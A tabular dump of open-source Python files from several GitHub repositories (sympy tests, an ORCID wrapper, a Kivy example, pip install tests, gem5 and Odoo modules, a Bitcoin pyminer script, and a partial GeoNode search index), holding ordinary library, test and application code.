repo_name | path | copies | size | content | license
---|---|---|---|---|---|
Gadal/sympy | sympy/combinatorics/tests/test_util.py | 98 | 4542 | from sympy.core.compatibility import range
from sympy.combinatorics.named_groups import SymmetricGroup, DihedralGroup,\
AlternatingGroup
from sympy.combinatorics.permutations import Permutation
from sympy.combinatorics.util import _check_cycles_alt_sym, _strip,\
_distribute_gens_by_base, _strong_gens_from_distr,\
_orbits_transversals_from_bsgs, _handle_precomputed_bsgs, _base_ordering,\
_remove_gens
from sympy.combinatorics.testutil import _verify_bsgs
def test_check_cycles_alt_sym():
perm1 = Permutation([[0, 1, 2, 3, 4, 5, 6], [7], [8], [9]])
perm2 = Permutation([[0, 1, 2, 3, 4, 5], [6, 7, 8, 9]])
perm3 = Permutation([[0, 1, 2, 3, 4], [5, 6, 7, 8, 9]])
assert _check_cycles_alt_sym(perm1) is True
assert _check_cycles_alt_sym(perm2) is False
assert _check_cycles_alt_sym(perm3) is False
def test_strip():
D = DihedralGroup(5)
D.schreier_sims()
member = Permutation([4, 0, 1, 2, 3])
not_member1 = Permutation([0, 1, 4, 3, 2])
not_member2 = Permutation([3, 1, 4, 2, 0])
identity = Permutation([0, 1, 2, 3, 4])
res1 = _strip(member, D.base, D.basic_orbits, D.basic_transversals)
res2 = _strip(not_member1, D.base, D.basic_orbits, D.basic_transversals)
res3 = _strip(not_member2, D.base, D.basic_orbits, D.basic_transversals)
assert res1[0] == identity
assert res1[1] == len(D.base) + 1
assert res2[0] == not_member1
assert res2[1] == len(D.base) + 1
assert res3[0] != identity
assert res3[1] == 2
def test_distribute_gens_by_base():
base = [0, 1, 2]
gens = [Permutation([0, 1, 2, 3]), Permutation([0, 1, 3, 2]),
Permutation([0, 2, 3, 1]), Permutation([3, 2, 1, 0])]
assert _distribute_gens_by_base(base, gens) == [gens,
[Permutation([0, 1, 2, 3]),
Permutation([0, 1, 3, 2]),
Permutation([0, 2, 3, 1])],
[Permutation([0, 1, 2, 3]),
Permutation([0, 1, 3, 2])]]
def test_strong_gens_from_distr():
strong_gens_distr = [[Permutation([0, 2, 1]), Permutation([1, 2, 0]),
Permutation([1, 0, 2])], [Permutation([0, 2, 1])]]
assert _strong_gens_from_distr(strong_gens_distr) == \
[Permutation([0, 2, 1]),
Permutation([1, 2, 0]),
Permutation([1, 0, 2])]
def test_orbits_transversals_from_bsgs():
S = SymmetricGroup(4)
S.schreier_sims()
base = S.base
strong_gens = S.strong_gens
strong_gens_distr = _distribute_gens_by_base(base, strong_gens)
result = _orbits_transversals_from_bsgs(base, strong_gens_distr)
orbits = result[0]
transversals = result[1]
base_len = len(base)
for i in range(base_len):
for el in orbits[i]:
assert transversals[i][el](base[i]) == el
for j in range(i):
assert transversals[i][el](base[j]) == base[j]
order = 1
for i in range(base_len):
order *= len(orbits[i])
assert S.order() == order
def test_handle_precomputed_bsgs():
A = AlternatingGroup(5)
A.schreier_sims()
base = A.base
strong_gens = A.strong_gens
result = _handle_precomputed_bsgs(base, strong_gens)
strong_gens_distr = _distribute_gens_by_base(base, strong_gens)
assert strong_gens_distr == result[2]
transversals = result[0]
orbits = result[1]
base_len = len(base)
for i in range(base_len):
for el in orbits[i]:
assert transversals[i][el](base[i]) == el
for j in range(i):
assert transversals[i][el](base[j]) == base[j]
order = 1
for i in range(base_len):
order *= len(orbits[i])
assert A.order() == order
def test_base_ordering():
base = [2, 4, 5]
degree = 7
assert _base_ordering(base, degree) == [3, 4, 0, 5, 1, 2, 6]
def test_remove_gens():
S = SymmetricGroup(10)
base, strong_gens = S.schreier_sims_incremental()
new_gens = _remove_gens(base, strong_gens)
assert _verify_bsgs(S, base, new_gens) is True
A = AlternatingGroup(7)
base, strong_gens = A.schreier_sims_incremental()
new_gens = _remove_gens(base, strong_gens)
assert _verify_bsgs(A, base, new_gens) is True
D = DihedralGroup(2)
base, strong_gens = D.schreier_sims_incremental()
new_gens = _remove_gens(base, strong_gens)
assert _verify_bsgs(D, base, new_gens) is True
| bsd-3-clause |
njall/Orctrix | flaskapp/orcid.py | 1 | 3759 | """
API wrapper for ORCID.
"""
import hashlib
import logging
import re
import json
import requests
logging.basicConfig(level=logging.DEBUG)
BASE_URL = "https://pub.orcid.org/"
def _get_raw_json(orcid_id, action=""):
"""Get raw JSON file for orcid_id."""
url = orcid_url(orcid_id, action)
logging.info(url)
resp = requests.get(url,
headers={'Accept':'application/orcid+json'})
return resp.json()
def orcid_url(orcid_id, action=""):
return BASE_URL + orcid_id + action
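# Example of the URL this helper builds (the ORCID iD below is a made-up
# illustration, not something used by this module):
# orcid_url("0000-0002-1825-0097", "/orcid-works")
# -> "https://pub.orcid.org/0000-0002-1825-0097/orcid-works"
# _get_raw_json() then fetches that URL with an 'application/orcid+json'
# Accept header.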
def get_profile(orcid_id):
"""Get JSON for Orcid and clean it."""
raw_json = _get_raw_json(orcid_id)
# TODO Add information
profile = {}
for name in ('credit_name', 'given_names', 'family_name'):
try:
profile[name] = raw_json.get("orcid-profile").get("orcid-bio").get("personal-details").get(name.replace('_', '-')).get("value")
except:
profile[name] = None
if profile['credit_name']:
profile['name'] = profile['credit_name']
else:
profile['name'] = profile['given_names'] + ' ' + profile['family_name']
try:
profile['email'] = raw_json.get("orcid-profile").get("orcid-bio").get("contact-details").get("email")[0].get("value").lower().strip()
except:
profile['email'] = None
profile['affiliation'] = get_current_affiliation(orcid_id)
try:
profile['bio'] = raw_json.get('orcid-profile').get('orcid-bio').get('biography').get('value')
except:
profile['bio'] = None
if profile['email']:
profile['gravatarhash'] = hashlib.md5(profile['email'].encode('utf-8')).hexdigest()
else:
profile['gravatarhash'] = None
return profile
def get_works(orcid_id):
""" Return dictionary containing work of person with ORCID id. Dict indexed by DOI of works """
raw_json = _get_raw_json(orcid_id, "/orcid-works")
try:
works = raw_json['orcid-profile']['orcid-activities']['orcid-works']['orcid-work']
except:
works = None
d = []
# TODO Improve the box_type selection
box_type = "full"
if works:
for item in works:
if box_type == "full":
box_type = "images"
elif box_type == "images":
box_type = "donut"
else:
box_type = "full"
doi, tmp_d = work_item(item)
if tmp_d:
tmp_d["doi"] = doi
tmp_d["image"] = None
# XXX Need to parse some information
if tmp_d.get("cite") and tmp_d.get("cite").get("work-citation-type") == "BIBTEX":
m = re.search('title\s?=\s?{(.+)}', tmp_d.get("cite").get("citation"))
tmp_d["title"] = m.group(1)
else:
pass
tmp_d["box_type"] = box_type
d.append(tmp_d)
return d
def get_current_affiliation(orcid_id):
#raw_json = _get_raw_json(orcid_id, "orcid-employment")
string = "I am from the university of life mate"
return string
def work_item(item):
dobj={}
if item['work-external-identifiers'] and item['work-citation']:
doi = item['work-external-identifiers']['work-external-identifier'][0]['work-external-identifier-id']['value']
dobj['cite'] = item['work-citation']
if item['url']:
dobj['url'] = item['url'].get("value")
else:
dobj['url'] = "Not available"
dobj['title'] = item['work-title']['title']['value']
dobj['subtitle'] = item.get('work-title').get("subtitle")
dobj['description'] = item.get('short-description')
#dobj['type'] = item['type']
return doi, dobj,
else:
return None, None
| mit |
xiaoyanit/kivy | examples/animation/animate.py | 40 | 1338 | '''
Widget animation
================
This example demonstrates creating and applying a multi-part animation to
a button widget. You should see a button labelled 'plop' that will move with
an animation when clicked.
'''
import kivy
kivy.require('1.0.7')
from kivy.animation import Animation
from kivy.app import App
from kivy.uix.button import Button
class TestApp(App):
def animate(self, instance):
# create an animation object. This object could be stored
# and reused each call or reused across different widgets.
# += is a sequential step, while &= is in parallel
animation = Animation(pos=(100, 100), t='out_bounce')
animation += Animation(pos=(200, 100), t='out_bounce')
animation &= Animation(size=(500, 500))
animation += Animation(size=(100, 50))
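# A rough sketch of the resulting timeline (reading the composition above):
# the button moves to (100, 100) and then to (200, 100); in parallel with
# those two moves it grows to 500x500; once both finish it shrinks to 100x50.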
# apply the animation on the button, passed in the "instance" argument
# Notice that default 'click' animation (changing the button
# color while the mouse is down) is unchanged.
animation.start(instance)
def build(self):
# create a button, and attach animate() method as a on_press handler
button = Button(size_hint=(None, None), text='plop',
on_press=self.animate)
return button
if __name__ == '__main__':
TestApp().run()
| mit |
haridsv/pip | tests/functional/test_install_reqs.py | 21 | 8848 | import os.path
import textwrap
import pytest
from tests.lib import (pyversion, path_to_url,
_create_test_package_with_subdirectory)
from tests.lib.local_repos import local_checkout
@pytest.mark.network
def test_requirements_file(script):
"""
Test installing from a requirements file.
"""
other_lib_name, other_lib_version = 'anyjson', '0.3'
script.scratch_path.join("initools-req.txt").write(textwrap.dedent("""\
INITools==0.2
# and something else to test out:
%s<=%s
""" % (other_lib_name, other_lib_version)))
result = script.pip(
'install', '-r', script.scratch_path / 'initools-req.txt'
)
assert (
script.site_packages / 'INITools-0.2-py%s.egg-info' %
pyversion in result.files_created
)
assert script.site_packages / 'initools' in result.files_created
assert result.files_created[script.site_packages / other_lib_name].dir
fn = '%s-%s-py%s.egg-info' % (other_lib_name, other_lib_version, pyversion)
assert result.files_created[script.site_packages / fn].dir
def test_schema_check_in_requirements_file(script):
"""
Test installing from a requirements file with an invalid vcs schema.
"""
script.scratch_path.join("file-egg-req.txt").write(
"\n%s\n" % (
"git://github.com/alex/django-fixture-generator.git"
"#egg=fixture_generator"
)
)
with pytest.raises(AssertionError):
script.pip(
"install", "-vvv", "-r", script.scratch_path / "file-egg-req.txt"
)
def test_relative_requirements_file(script, data):
"""
Test installing from a requirements file with a relative path and an
egg= definition.
"""
url = path_to_url(
os.path.join(data.root, "packages", "..", "packages", "FSPkg")
) + '#egg=FSPkg'
script.scratch_path.join("file-egg-req.txt").write(textwrap.dedent("""\
%s
""" % url))
result = script.pip(
'install', '-vvv', '-r', script.scratch_path / 'file-egg-req.txt'
)
assert (
script.site_packages / 'FSPkg-0.1.dev0-py%s.egg-info' % pyversion
) in result.files_created, str(result)
assert (script.site_packages / 'fspkg') in result.files_created, (
str(result.stdout)
)
@pytest.mark.network
def test_multiple_requirements_files(script, tmpdir):
"""
Test installing from multiple nested requirements files.
"""
other_lib_name, other_lib_version = 'anyjson', '0.3'
script.scratch_path.join("initools-req.txt").write(
textwrap.dedent("""
-e %s@10#egg=INITools-dev
-r %s-req.txt
""") %
(
local_checkout(
'svn+http://svn.colorstudy.com/INITools/trunk',
tmpdir.join("cache"),
),
other_lib_name
),
)
script.scratch_path.join("%s-req.txt" % other_lib_name).write(
"%s<=%s" % (other_lib_name, other_lib_version)
)
result = script.pip(
'install', '-r', script.scratch_path / 'initools-req.txt'
)
assert result.files_created[script.site_packages / other_lib_name].dir
fn = '%s-%s-py%s.egg-info' % (other_lib_name, other_lib_version, pyversion)
assert result.files_created[script.site_packages / fn].dir
assert script.venv / 'src' / 'initools' in result.files_created
def test_package_in_constraints_and_dependencies(script, data):
script.scratch_path.join("constraints.txt").write(
"TopoRequires2==0.0.1\nTopoRequires==0.0.1"
)
result = script.pip('install', '--no-index', '-f',
data.find_links, '-c', script.scratch_path /
'constraints.txt', 'TopoRequires2')
assert 'installed TopoRequires-0.0.1' in result.stdout
def test_multiple_constraints_files(script, data):
script.scratch_path.join("outer.txt").write("-c inner.txt")
script.scratch_path.join("inner.txt").write(
"Upper==1.0")
result = script.pip(
'install', '--no-index', '-f', data.find_links, '-c',
script.scratch_path / 'outer.txt', 'Upper')
assert 'installed Upper-1.0' in result.stdout
def test_respect_order_in_requirements_file(script, data):
script.scratch_path.join("frameworks-req.txt").write(textwrap.dedent("""\
parent
child
simple
"""))
result = script.pip(
'install', '--no-index', '-f', data.find_links, '-r',
script.scratch_path / 'frameworks-req.txt'
)
downloaded = [line for line in result.stdout.split('\n')
if 'Collecting' in line]
assert 'parent' in downloaded[0], (
'First download should be "parent" but was "%s"' % downloaded[0]
)
assert 'child' in downloaded[1], (
'Second download should be "child" but was "%s"' % downloaded[1]
)
assert 'simple' in downloaded[2], (
'Third download should be "simple" but was "%s"' % downloaded[2]
)
def test_install_local_editable_with_extras(script, data):
to_install = data.packages.join("LocalExtras")
res = script.pip(
'install', '-e', to_install + '[bar]', '--process-dependency-links',
expect_error=False,
expect_stderr=True,
)
assert script.site_packages / 'easy-install.pth' in res.files_updated, (
str(res)
)
assert (
script.site_packages / 'LocalExtras.egg-link' in res.files_created
), str(res)
assert script.site_packages / 'simple' in res.files_created, str(res)
@pytest.mark.network
def test_install_collected_dependancies_first(script):
result = script.pip(
'install', 'paramiko',
)
text = [line for line in result.stdout.split('\n')
if 'Installing' in line][0]
assert text.endswith('paramiko')
@pytest.mark.network
def test_install_local_editable_with_subdirectory(script):
version_pkg_path = _create_test_package_with_subdirectory(script,
'version_subdir')
result = script.pip(
'install', '-e',
'%s#egg=version_subpkg&subdirectory=version_subdir' %
('git+file://%s' % version_pkg_path,)
)
result.assert_installed('version-subpkg', sub_dir='version_subdir')
def test_user_with_prefix_in_pydistutils_cfg(script, data, virtualenv):
virtualenv.system_site_packages = True
homedir = script.environ["HOME"]
script.scratch_path.join("bin").mkdir()
with open(os.path.join(homedir, ".pydistutils.cfg"), "w") as cfg:
cfg.write(textwrap.dedent("""
[install]
prefix=%s""" % script.scratch_path))
result = script.pip('install', '--user', '--no-index', '-f',
data.find_links, 'requiresupper')
assert 'installed requiresupper' in result.stdout
def test_nowheel_user_with_prefix_in_pydistutils_cfg(script, data, virtualenv):
virtualenv.system_site_packages = True
homedir = script.environ["HOME"]
script.scratch_path.join("bin").mkdir()
with open(os.path.join(homedir, ".pydistutils.cfg"), "w") as cfg:
cfg.write(textwrap.dedent("""
[install]
prefix=%s""" % script.scratch_path))
result = script.pip('install', '--no-use-wheel', '--user', '--no-index',
'-f', data.find_links, 'requiresupper')
assert 'installed requiresupper' in result.stdout
def test_install_option_in_requirements_file(script, data, virtualenv):
"""
Test that --install-option in a requirements file overrides the same option given on the command line.
"""
script.scratch_path.join("home1").mkdir()
script.scratch_path.join("home2").mkdir()
script.scratch_path.join("reqs.txt").write(
textwrap.dedent(
"""simple --install-option='--home=%s'"""
% script.scratch_path.join("home1")))
result = script.pip(
'install', '--no-index', '-f', data.find_links, '-r',
script.scratch_path / 'reqs.txt',
'--install-option=--home=%s' % script.scratch_path.join("home2"),
expect_stderr=True)
package_dir = script.scratch / 'home1' / 'lib' / 'python' / 'simple'
assert package_dir in result.files_created
def test_constraints_not_installed_by_default(script, data):
script.scratch_path.join("c.txt").write("requiresupper")
result = script.pip(
'install', '--no-index', '-f', data.find_links, '-c',
script.scratch_path / 'c.txt', 'Upper')
assert 'requiresupper' not in result.stdout
def test_constraints_only_causes_error(script, data):
script.scratch_path.join("c.txt").write("requiresupper")
result = script.pip(
'install', '--no-index', '-f', data.find_links, '-c',
script.scratch_path / 'c.txt', expect_error=True)
assert 'installed requiresupper' not in result.stdout
| mit |
nghia-huynh/gem5-stable | tests/configs/simple-atomic-mp.py | 69 | 2376 | # Copyright (c) 2013 ARM Limited
# All rights reserved.
#
# The license below extends only to copyright in the software and shall
# not be construed as granting a license to any other intellectual
# property including but not limited to intellectual property relating
# to a hardware implementation of the functionality of the software
# licensed hereunder. You may use the software subject to the license
# terms below provided that you ensure that this notice is replicated
# unmodified and in its entirety in all distributions of the software,
# modified or unmodified, in source code or in binary form.
#
# Copyright (c) 2006-2007 The Regents of The University of Michigan
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met: redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer;
# redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution;
# neither the name of the copyright holders nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Authors: Andreas Hansson
from m5.objects import *
from base_config import *
nb_cores = 4
root = BaseSESystem(mem_mode='atomic', cpu_class=AtomicSimpleCPU,
num_cpus=nb_cores).create_root()
| bsd-3-clause |
dgzurita/odoo | addons/purchase/partner.py | 210 | 2566 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.osv import fields, osv
class res_partner(osv.osv):
_name = 'res.partner'
_inherit = 'res.partner'
def _purchase_invoice_count(self, cr, uid, ids, field_name, arg, context=None):
PurchaseOrder = self.pool['purchase.order']
Invoice = self.pool['account.invoice']
return {
partner_id: {
'purchase_order_count': PurchaseOrder.search_count(cr,uid, [('partner_id', 'child_of', partner_id)], context=context),
'supplier_invoice_count': Invoice.search_count(cr,uid, [('partner_id', 'child_of', partner_id), ('type','=','in_invoice')], context=context)
}
for partner_id in ids
}
def _commercial_fields(self, cr, uid, context=None):
return super(res_partner, self)._commercial_fields(cr, uid, context=context) + ['property_product_pricelist_purchase']
_columns = {
'property_product_pricelist_purchase': fields.property(
type='many2one',
relation='product.pricelist',
domain=[('type','=','purchase')],
string="Purchase Pricelist",
help="This pricelist will be used, instead of the default one, for purchases from the current partner"),
'purchase_order_count': fields.function(_purchase_invoice_count, string='# of Purchase Order', type='integer', multi="count"),
'supplier_invoice_count': fields.function(_purchase_invoice_count, string='# Supplier Invoices', type='integer', multi="count"),
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
ramitalat/odoo | addons/hr_attendance/report/attendance_errors.py | 377 | 3669 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import datetime
import time
from openerp.osv import osv
from openerp.report import report_sxw
class attendance_print(report_sxw.rml_parse):
def __init__(self, cr, uid, name, context):
super(attendance_print, self).__init__(cr, uid, name, context=context)
self.localcontext.update({
'time': time,
'lst': self._lst,
'total': self._lst_total,
'get_employees':self._get_employees,
})
def _get_employees(self, emp_ids):
emp_obj_list = self.pool.get('hr.employee').browse(self.cr, self.uid, emp_ids)
return emp_obj_list
def _lst(self, employee_id, dt_from, dt_to, max, *args):
self.cr.execute("select name as date, create_date, action, create_date-name as delay from hr_attendance where employee_id=%s and to_char(name,'YYYY-mm-dd')<=%s and to_char(name,'YYYY-mm-dd')>=%s and action IN (%s,%s) order by name", (employee_id, dt_to, dt_from, 'sign_in', 'sign_out'))
res = self.cr.dictfetchall()
for r in res:
if r['action'] == 'sign_out':
r['delay'] = -r['delay']
temp = r['delay'].seconds
r['delay'] = str(r['delay']).split('.')[0]
if abs(temp) < max*60:
r['delay2'] = r['delay']
else:
r['delay2'] = '/'
return res
def _lst_total(self, employee_id, dt_from, dt_to, max, *args):
self.cr.execute("select name as date, create_date, action, create_date-name as delay from hr_attendance where employee_id=%s and to_char(name,'YYYY-mm-dd')<=%s and to_char(name,'YYYY-mm-dd')>=%s and action IN (%s,%s) order by name", (employee_id, dt_to, dt_from, 'sign_in', 'sign_out'))
res = self.cr.dictfetchall()
if not res:
return ('/','/')
total2 = datetime.timedelta(seconds = 0, minutes = 0, hours = 0)
total = datetime.timedelta(seconds = 0, minutes = 0, hours = 0)
for r in res:
if r['action'] == 'sign_out':
r['delay'] = -r['delay']
total += r['delay']
if abs(r['delay'].seconds) < max*60:
total2 += r['delay']
result_dict = {
'total': total and str(total).split('.')[0],
'total2': total2 and str(total2).split('.')[0]
}
return [result_dict]
class report_hr_attendanceerrors(osv.AbstractModel):
_name = 'report.hr_attendance.report_attendanceerrors'
_inherit = 'report.abstract_report'
_template = 'hr_attendance.report_attendanceerrors'
_wrapped_report_class = attendance_print
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
kalilinuxoo7/bitsendupgrade | contrib/pyminer/pyminer.py | 2 | 6434 | #!/usr/bin/python
#
# Copyright (c) 2011 The Bitcoin developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
import time
import json
import pprint
import hashlib
import struct
import re
import base64
import httplib
import sys
from multiprocessing import Process
ERR_SLEEP = 15
MAX_NONCE = 1000000L
settings = {}
pp = pprint.PrettyPrinter(indent=4)
class BitcoinRPC:
OBJID = 1
def __init__(self, host, port, username, password):
authpair = "%s:%s" % (username, password)
self.authhdr = "Basic %s" % (base64.b64encode(authpair))
self.conn = httplib.HTTPConnection(host, port, False, 30)
def rpc(self, method, params=None):
self.OBJID += 1
obj = { 'version' : '1.1',
'method' : method,
'id' : self.OBJID }
if params is None:
obj['params'] = []
else:
obj['params'] = params
self.conn.request('POST', '/', json.dumps(obj),
{ 'Authorization' : self.authhdr,
'Content-type' : 'application/json' })
resp = self.conn.getresponse()
if resp is None:
print "JSON-RPC: no response"
return None
body = resp.read()
resp_obj = json.loads(body)
if resp_obj is None:
print "JSON-RPC: cannot JSON-decode body"
return None
if 'error' in resp_obj and resp_obj['error'] != None:
return resp_obj['error']
if 'result' not in resp_obj:
print "JSON-RPC: no result in object"
return None
return resp_obj['result']
def getblockcount(self):
return self.rpc('getblockcount')
def getwork(self, data=None):
return self.rpc('getwork', data)
def uint32(x):
return x & 0xffffffffL
def bytereverse(x):
return uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) |
(((x) >> 8) & 0x0000ff00) | ((x) >> 24) ))
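# Worked example (a sanity check, not part of the original script):
# bytereverse(0x12345678) == 0x78563412, i.e. the four bytes of a 32-bit word
# are swapped end for end. bufreverse() below applies this to every 4-byte
# word of a buffer.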
def bufreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
word = struct.unpack('@I', in_buf[i:i+4])[0]
out_words.append(struct.pack('@I', bytereverse(word)))
return ''.join(out_words)
def wordreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
out_words.append(in_buf[i:i+4])
out_words.reverse()
return ''.join(out_words)
class Miner:
def __init__(self, id):
self.id = id
self.max_nonce = MAX_NONCE
def work(self, datastr, targetstr):
# decode work data hex string to binary
static_data = datastr.decode('hex')
static_data = bufreverse(static_data)
# the first 76b of 80b do not change
blk_hdr = static_data[:76]
# decode 256-bit target value
targetbin = targetstr.decode('hex')
targetbin = targetbin[::-1] # byte-swap and dword-swap
targetbin_str = targetbin.encode('hex')
target = long(targetbin_str, 16)
# pre-hash first 76b of block header
static_hash = hashlib.sha256()
static_hash.update(blk_hdr)
for nonce in xrange(self.max_nonce):
# encode 32-bit nonce value
nonce_bin = struct.pack("<I", nonce)
# hash final 4b, the nonce value
hash1_o = static_hash.copy()
hash1_o.update(nonce_bin)
hash1 = hash1_o.digest()
# sha256 hash of sha256 hash
hash_o = hashlib.sha256()
hash_o.update(hash1)
hash = hash_o.digest()
# quick test for winning solution: high 32 bits zero?
if hash[-4:] != '\0\0\0\0':
continue
# convert binary hash to 256-bit Python long
hash = bufreverse(hash)
hash = wordreverse(hash)
hash_str = hash.encode('hex')
l = long(hash_str, 16)
# proof-of-work test: hash < target
if l < target:
print time.asctime(), "PROOF-OF-WORK found: %064x" % (l,)
return (nonce + 1, nonce_bin)
else:
print time.asctime(), "PROOF-OF-WORK false positive %064x" % (l,)
# return (nonce + 1, nonce_bin)
return (nonce + 1, None)
def submit_work(self, rpc, original_data, nonce_bin):
nonce_bin = bufreverse(nonce_bin)
nonce = nonce_bin.encode('hex')
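# The 32-bit nonce occupies bytes 76..80 of the 80-byte block header, which in
# the hex-encoded getwork 'data' string is characters 152..160; hence the
# splice below.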
solution = original_data[:152] + nonce + original_data[160:256]
param_arr = [ solution ]
result = rpc.getwork(param_arr)
print time.asctime(), "--> Upstream RPC result:", result
def iterate(self, rpc):
work = rpc.getwork()
if work is None:
time.sleep(ERR_SLEEP)
return
if 'data' not in work or 'target' not in work:
time.sleep(ERR_SLEEP)
return
time_start = time.time()
(hashes_done, nonce_bin) = self.work(work['data'],
work['target'])
time_end = time.time()
time_diff = time_end - time_start
self.max_nonce = long(
(hashes_done * settings['scantime']) / time_diff)
if self.max_nonce > 0xfffffffaL:
self.max_nonce = 0xfffffffaL
if settings['hashmeter']:
print "HashMeter(%d): %d hashes, %.2f Khash/sec" % (
self.id, hashes_done,
(hashes_done / 1000.0) / time_diff)
if nonce_bin is not None:
self.submit_work(rpc, work['data'], nonce_bin)
def loop(self):
rpc = BitcoinRPC(settings['host'], settings['port'],
settings['rpcuser'], settings['rpcpass'])
if rpc is None:
return
while True:
self.iterate(rpc)
def miner_thread(id):
miner = Miner(id)
miner.loop()
if __name__ == '__main__':
if len(sys.argv) != 2:
print "Usage: pyminer.py CONFIG-FILE"
sys.exit(1)
f = open(sys.argv[1])
for line in f:
# skip comment lines
m = re.search('^\s*#', line)
if m:
continue
# parse key=value lines
m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
if m is None:
continue
settings[m.group(1)] = m.group(2)
f.close()
if 'host' not in settings:
settings['host'] = '127.0.0.1'
if 'port' not in settings:
settings['port'] = 8800
if 'threads' not in settings:
settings['threads'] = 1
if 'hashmeter' not in settings:
settings['hashmeter'] = 0
if 'scantime' not in settings:
settings['scantime'] = 30L
if 'rpcuser' not in settings or 'rpcpass' not in settings:
print "Missing username and/or password in cfg file"
sys.exit(1)
settings['port'] = int(settings['port'])
settings['threads'] = int(settings['threads'])
settings['hashmeter'] = int(settings['hashmeter'])
settings['scantime'] = long(settings['scantime'])
thr_list = []
for thr_id in range(settings['threads']):
p = Process(target=miner_thread, args=(thr_id,))
p.start()
thr_list.append(p)
time.sleep(1) # stagger threads
print settings['threads'], "mining threads started"
print time.asctime(), "Miner Starts - %s:%s" % (settings['host'], settings['port'])
try:
for thr_proc in thr_list:
thr_proc.join()
except KeyboardInterrupt:
pass
print time.asctime(), "Miner Stops - %s:%s" % (settings['host'], settings['port'])
| mit |
GFDRR/geonode | geonode/documents/search_indexes.py | 20 | 4991 | # -*- coding: utf-8 -*-
#########################################################################
#
# Copyright (C) 2016 OSGeo
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
#########################################################################
from agon_ratings.models import OverallRating
from dialogos.models import Comment
from django.contrib.contenttypes.models import ContentType
from django.db.models import Avg
from haystack import indexes
from geonode.documents.models import Document
class DocumentIndex(indexes.SearchIndex, indexes.Indexable):
id = indexes.IntegerField(model_attr='id')
abstract = indexes.CharField(model_attr="abstract", boost=1.5)
category__gn_description = indexes.CharField(model_attr="category__gn_description", null=True)
csw_type = indexes.CharField(model_attr="csw_type")
csw_wkt_geometry = indexes.CharField(model_attr="csw_wkt_geometry")
detail_url = indexes.CharField(model_attr="get_absolute_url")
owner__username = indexes.CharField(model_attr="owner", faceted=True, null=True)
popular_count = indexes.IntegerField(
model_attr="popular_count",
default=0,
boost=20)
share_count = indexes.IntegerField(model_attr="share_count", default=0)
rating = indexes.IntegerField(null=True)
srid = indexes.CharField(model_attr="srid")
supplemental_information = indexes.CharField(model_attr="supplemental_information", null=True)
thumbnail_url = indexes.CharField(model_attr="thumbnail_url", null=True)
uuid = indexes.CharField(model_attr="uuid")
title = indexes.CharField(model_attr="title", boost=2)
date = indexes.DateTimeField(model_attr="date")
text = indexes.EdgeNgramField(document=True, use_template=True, stored=False)
type = indexes.CharField(faceted=True)
title_sortable = indexes.CharField(indexed=False, stored=False) # Necessary for sorting
category = indexes.CharField(
model_attr="category__identifier",
faceted=True,
null=True,
stored=True)
bbox_left = indexes.FloatField(model_attr="bbox_x0", null=True, stored=False)
bbox_right = indexes.FloatField(model_attr="bbox_x1", null=True, stored=False)
bbox_bottom = indexes.FloatField(model_attr="bbox_y0", null=True, stored=False)
